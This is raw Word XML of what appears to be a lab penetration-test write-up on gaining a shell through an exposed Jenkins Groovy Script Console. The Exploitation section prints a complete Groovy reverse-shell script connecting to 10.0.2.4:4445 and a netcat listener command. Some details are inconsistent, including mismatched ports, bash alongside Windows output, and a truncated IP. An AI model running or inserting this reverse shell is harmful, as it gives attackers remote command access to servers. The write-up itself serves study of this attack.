          <w:p w14:paraId="6A952233" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27FE8B72" w14:textId="77777777" w:rsidR="00E872FA" w:rsidRDefault="00E872FA"/>
    <w:p w14:paraId="6B385A78" w14:textId="77777777" w:rsidR="00E872FA" w:rsidRDefault="00E872FA">
      <w:pPr>
        <w:sectPr w:rsidR="00E872FA" w:rsidSect="006905C4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09503529" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="1889"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8626" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BF3A76D" w14:textId="47C5A5DA" w:rsidR="00AA059E" w:rsidRPr="00831F6E" w:rsidRDefault="008065EB" w:rsidP="008D5E3D">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
            <w:r w:rsidRPr="008065EB">
              <w:lastRenderedPageBreak/>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2894" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7D6AE7EC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88960" behindDoc="1" locked="1" layoutInCell="1" allowOverlap="1" wp14:anchorId="55D09FE4" wp14:editId="3F92CCD6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1" name="Picture 9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49A27A27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65141313" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
          <w:p w14:paraId="4BA6A16C" w14:textId="16108305" w:rsidR="00AA059E" w:rsidRPr="00347221" w:rsidRDefault="008065EB" w:rsidP="00D2733B">
            <w:pPr>
              <w:spacing w:line="36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347221">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">The vulnerability exploited in this scenario is related to the Jenkins server running on </w:t>
            </w:r>
            <w:r w:rsidRPr="00D2733B">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">port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8484</w:t>
            </w:r>
            <w:r w:rsidRPr="00347221">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. Specifically, it involves the abuse of the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Jenkins Groovy Script Console</w:t>
            </w:r>
            <w:r w:rsidRPr="00347221">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>, which allowed us to execute a reverse shell on the target system. The vulnerability is linked to the default Jenkins configuration, which may allow unauthorized users to run scripts with system-level privileges.</w:t>
            </w:r>
            <w:r w:rsidR="00347221">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> Use this command to “</w:t>
            </w:r>
            <w:r w:rsidR="00347221"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http://10.0.2.:8484</w:t>
            </w:r>
            <w:r w:rsidR="00347221">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">” to connect to the Jenkins server page. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F9D41D0" w14:textId="1DFEF3A9" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="008D5E3D"/>
          <w:p w14:paraId="5EF2A58C" w14:textId="4D438FED" w:rsidR="00AA059E" w:rsidRDefault="00000000" w:rsidP="008D5E3D">
            <w:pPr>
              <w:pStyle w:val="Subhead"/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:id w:val="-1915316293"/>
                <w:placeholder>
                  <w:docPart w:val="5C6E5A11AAF64FF6B93078D9D67A7C47"/>
                </w:placeholder>
                <w15:appearance w15:val="hidden"/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidR="00347221">
                  <w:rPr>
                    <w:noProof/>
                  </w:rPr>
                  <w:drawing>
                    <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F556A2" wp14:editId="2D136881">
                      <wp:extent cx="6833616" cy="2978026"/>
                      <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                      <wp:docPr id="1524891331" name="Picture 1" descr="A screenshot of a computer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4891331" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated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71315" cy="29944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727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DC5D5A9" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57D1975E" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="00234F18">
      <w:pPr>
        <w:sectPr w:rsidR="00AA059E" w:rsidSect="006905C4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70"/>
        <w:gridCol w:w="540"/>
        <w:gridCol w:w="2416"/>
        <w:gridCol w:w="2167"/>
        <w:gridCol w:w="727"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA059E" w14:paraId="5A482194" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="1889"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8626" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="1EA8C8E4" w14:textId="49080174" w:rsidR="00AA059E" w:rsidRPr="008D5E3D" w:rsidRDefault="00C85F71" w:rsidP="008D5E3D">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
            <w:r w:rsidRPr="00C85F71">
              <w:lastRenderedPageBreak/>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2894" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4C2FA134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91008" behindDoc="1" locked="1" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DC913DE" wp14:editId="260C1B98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2" name="Picture 91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 91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6A6866C7" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="2388"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10793" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="1C3D14DE" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
          <w:p w14:paraId="571E1671" w14:textId="2640DFAA" w:rsidR="009929B8" w:rsidRPr="009929B8" w:rsidRDefault="009929B8" w:rsidP="005D42B1">
            <w:pPr>
              <w:spacing w:line="36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A reverse shell script was obtained from an online source and modified to include the target host's IP address (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10.0.2.4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), a specific port (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4445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), and the desired command shell (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bash)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.</w:t>
            </w:r>
            <w:r w:rsidR="00A56059">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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 xml:space="preserve">The modified script was pasted into the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Jenkins Script Console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, which was accessible via the Jenkins web UI.</w:t>
            </w:r>
            <w:r w:rsidR="00A56059">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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Upon running the script, a reverse shell connection was established to the attacker's machine, granting access to the victim machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="384FC850" w14:textId="77777777" w:rsidR="009929B8" w:rsidRPr="009929B8" w:rsidRDefault="009929B8" w:rsidP="005D42B1">
            <w:pPr>
              <w:spacing w:line="36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proofErr w:type="spellStart"/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Netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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)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 xml:space="preserve"> was used on the attacker's machine to create a listener on port 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8484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.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="149E7728" w14:textId="4ED58396" w:rsidR="000763D6" w:rsidRDefault="009929B8" w:rsidP="00E33981">
            <w:pPr>
              <w:spacing w:line="36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After clicking "</w:t>
            </w:r>
            <w:r w:rsidRPr="006E18E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run</w:t>
            </w:r>
            <w:r w:rsidRPr="009929B8">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>" in the Jenkins console, the reverse shell connection was initiated, providing access to the victim machine's command prompt</w:t>
            </w:r>
            <w:r w:rsidR="00BF6D43">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00BF6D43">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BF6D43" w:rsidRPr="00BF6D43">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Did “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00BF6D43" w:rsidRPr="00BF6D4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whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00BF6D43" w:rsidRPr="00BF6D43">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">” command and </w:t>
            </w:r>
            <w:r w:rsidR="00BF6D43">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">it </w:t>
            </w:r>
            <w:r w:rsidR="00BF6D43" w:rsidRPr="00BF6D43">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>return “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00BF6D43" w:rsidRPr="00BF6D4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nt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00BF6D43" w:rsidRPr="00BF6D43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 xml:space="preserve"> authority\local service</w:t>
            </w:r>
            <w:r w:rsidR="00BF6D43" w:rsidRPr="00BF6D43">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidR="00BF6D43">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000763D6">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Below is t</w:t>
            </w:r>
            <w:r w:rsidR="0093590C">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>he link and</w:t>
            </w:r>
            <w:r w:rsidR="000763D6">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A04ED7">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r w:rsidR="000763D6">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> from web site “</w:t>
            </w:r>
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidR="00F01884" w:rsidRPr="00E33981">
                <w:rPr>
                  <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
                  <w:sz w:val="24"/>
                </w:rPr>
                <w:t>https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00F01884">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D3D88ED" w14:textId="77777777" w:rsidR="000763D6" w:rsidRPr="00E33981" w:rsidRDefault="000763D6" w:rsidP="000763D6">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720"/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</w:pPr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“String host="10.0.2.4</w:t>
            </w:r>
            <w:proofErr w:type="gram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";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3F97ADC9" w14:textId="7A91693C" w:rsidR="000763D6" w:rsidRPr="00BF6D43" w:rsidRDefault="000763D6" w:rsidP="00BF6D43">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720"/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</w:pPr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int port=4445;</w:t>
            </w:r>
            <w:r w:rsidR="00BF6D43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 xml:space="preserve"> </w:t>
            </w:r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 xml:space="preserve">String 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cmd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="bash";</w:t>
            </w:r>
            <w:r w:rsidR="00BF6D43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 xml:space="preserve"> </w:t>
            </w:r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 xml:space="preserve">Process p=new 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ProcessBuilder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(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cmd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).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redirectErrorStream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(true).start();Socket s=new Socket(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host,port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);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InputStream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 xml:space="preserve"> pi=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p.getInputStream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(),pe=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p.getErrorStream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 xml:space="preserve">(), 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si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=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s.getInputStream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();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OutputStream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 xml:space="preserve"> po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()&gt;0)so.write(pi.read());while(pe.available()&gt;0)so.write(pe.read());while(si.available()&gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {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p.exitValue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();break;}catch (Exception e){}};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p.destroy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();</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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s.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00E33981">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="green"/>
              </w:rPr>
              <w:t>(); “</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A564C4E" w14:textId="77777777" w:rsidR="000763D6" w:rsidRDefault="000763D6" w:rsidP="009929B8">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57528C1E" wp14:editId="4145FE31">
                  <wp:extent cx="6970596" cy="1937982"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
                  <wp:docPr id="22701985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019857" name="Picture 1" descr="A screenshot of a comput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839" cy="196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D1FDC" w14:textId="4CD26153" w:rsidR="00D24DBC" w:rsidRPr="00D24DBC" w:rsidRDefault="00807FC4" w:rsidP="009929B8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  <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">This </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D24DBC" w:rsidRPr="00807FC4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Netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D24DBC" w:rsidRPr="00D24DBC">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> command </w:t>
            </w:r>
            <w:r w:rsidR="00D24DBC">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D24DBC" w:rsidRPr="00D24DBC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nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D24DBC" w:rsidRPr="00D24DBC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 xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D24DBC" w:rsidRPr="00D24DBC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lvp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00D24DBC" w:rsidRPr="00D24DBC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 xml:space="preserve"> 8484</w:t>
            </w:r>
            <w:r w:rsidR="00D24DBC">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">” </w:t>
            </w:r>
            <w:r w:rsidR="00D24DBC" w:rsidRPr="00D24DBC">
              <w:rPr>
                <w:rFonts w:ascii="Poppins" w:eastAsia="Times New Roman" w:hAnsi="Poppins" w:cs="Poppins"/>
                <w:color w:val="152C61"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">is used for the listening to occur. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E5643EA" w14:textId="2BBA0D3A" w:rsidR="00D24DBC" w:rsidRDefault="00D24DBC" w:rsidP="009929B8">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B9A2916" wp14:editId="7866B2DB">
                  <wp:extent cx="3675341" cy="890016"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
                  <wp:docPr id="568766476" name="Picture 1" descr="A red line in a dar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766476" name="Picture 1" descr="A red line in a dark background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758" cy="92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</w:tcPr>
          <w:p w14:paraId="7E785BD8" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA059E" w14:paraId="495C9937" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="2789"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60583372" w14:textId="77777777" w:rsidR="00097D79" w:rsidRDefault="00097D79" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="385FB5E1" w14:textId="77777777" w:rsidR="00097D79" w:rsidRDefault="00097D79" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58BC0792" w14:textId="77777777" w:rsidR="00097D79" w:rsidRDefault="00097D79" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="544E793F" w14:textId="77777777" w:rsidR="00097D79" w:rsidRDefault="00097D79" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="294F32D2" w14:textId="77777777" w:rsidR="00097D79" w:rsidRDefault="00097D79" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42533C77" w14:textId="77777777" w:rsidR="00097D79" w:rsidRDefault="00097D79" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BAA6C2C" w14:textId="77777777" w:rsidR="00097D79" w:rsidRDefault="00097D79" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20F23BD2" w14:textId="77777777" w:rsidR="00097D79" w:rsidRDefault="00097D79" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4359ABBA" w14:textId="77777777" w:rsidR="00097D79" w:rsidRDefault="00097D79" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2CA275BA" w14:textId="77777777" w:rsidR="00097D79" w:rsidRDefault="00097D79" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46B4F4B6" w14:textId="77777777" w:rsidR="00097D79" w:rsidRDefault="00097D79" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="423BBD21" w14:textId="16E7E4B3" w:rsidR="00AA059E" w:rsidRDefault="00B21980" w:rsidP="00B21980">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21980">
              <w:lastRenderedPageBreak/>
              <w:t>References</w:t>
            </w:r>
            <w:r w:rsidR="00097D79"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700224" behindDoc="1" locked="1" layoutInCell="1" allowOverlap="1" wp14:anchorId="593D5C60" wp14:editId="2511B15D">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="margin">
                    <wp:posOffset>5540375</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="margin">
                    <wp:posOffset>-72390</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1839595" cy="1144270"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                  <wp:wrapNone/>
                  <wp:docPr id="654609734" name="Picture 65460973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Picture 91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" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08D376DB" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4583" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="33835732" w14:textId="146F8FAF" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="000D719D">
            <w:pPr>
              <w:pStyle w:val="Subhead"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="727" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50B4F660" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="004218DE"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA059E" w14:paraId="1CFD7739" w14:textId="77777777" w:rsidTr="00AA059E">
        <w:trPr>
          <w:trHeight w:val="2789"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10793" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="006EB2BE" w14:textId="77777777" w:rsidR="00AA059E" w:rsidRDefault="00AA059E" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E9AF7F8" w14:textId="77777777" w:rsidR="002478BA" w:rsidRDefault="002478BA" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
          </w:p>
          <w:p w14:paraId="1DF4F51E" w14:textId="77777777" w:rsidR="002478BA" w:rsidRDefault="002478BA" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
          </w:p>
          <w:p w14:paraId="27439851" w14:textId="77777777" w:rsidR="002478BA" w:rsidRDefault="002478BA" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
          </w:p>
          <w:p w14:paraId="4801118B" w14:textId="77777777" w:rsidR="002478BA" w:rsidRDefault="002478BA" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
          </w:p>
          <w:p w14:paraId="3CEE42E9" w14:textId="67371A83" w:rsidR="001C1A68" w:rsidRPr="001C1A68" w:rsidRDefault="001C1A68" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
            <w:r w:rsidRPr="001C1A68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Abusing Jenkins Groovy Script Console to Get Shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B89BC03" w14:textId="77777777" w:rsidR="001C1A68" w:rsidRDefault="001C1A68" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0DFE90FD" w14:textId="77777777" w:rsidR="001C1A68" w:rsidRDefault="001C1A68" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>This online source provided the reverse shell script and instructions for exploiting the Jenkins server's Groovy Script Console.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A0D01D7" w14:textId="77777777" w:rsidR="001C1A68" w:rsidRDefault="001C1A68" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="600C7D54" w14:textId="77777777" w:rsidR="001C1A68" w:rsidRPr="001C1A68" w:rsidRDefault="001C1A68" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/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</w:pPr>
            <w:r w:rsidRPr="001C1A68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Jenkins - Official Documentation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A30F2D4" w14:textId="77777777" w:rsidR="001C1A68" w:rsidRDefault="001C1A68" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22E09DC3" w14:textId="77777777" w:rsidR="001C1A68" w:rsidRDefault="001C1A68" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>For further information about Jenkins, its configuration, and best practices, refer to the official Jenkins documentation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E110727" w14:textId="77777777" w:rsidR="001C1A68" w:rsidRDefault="001C1A68" w:rsidP="001A5337">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
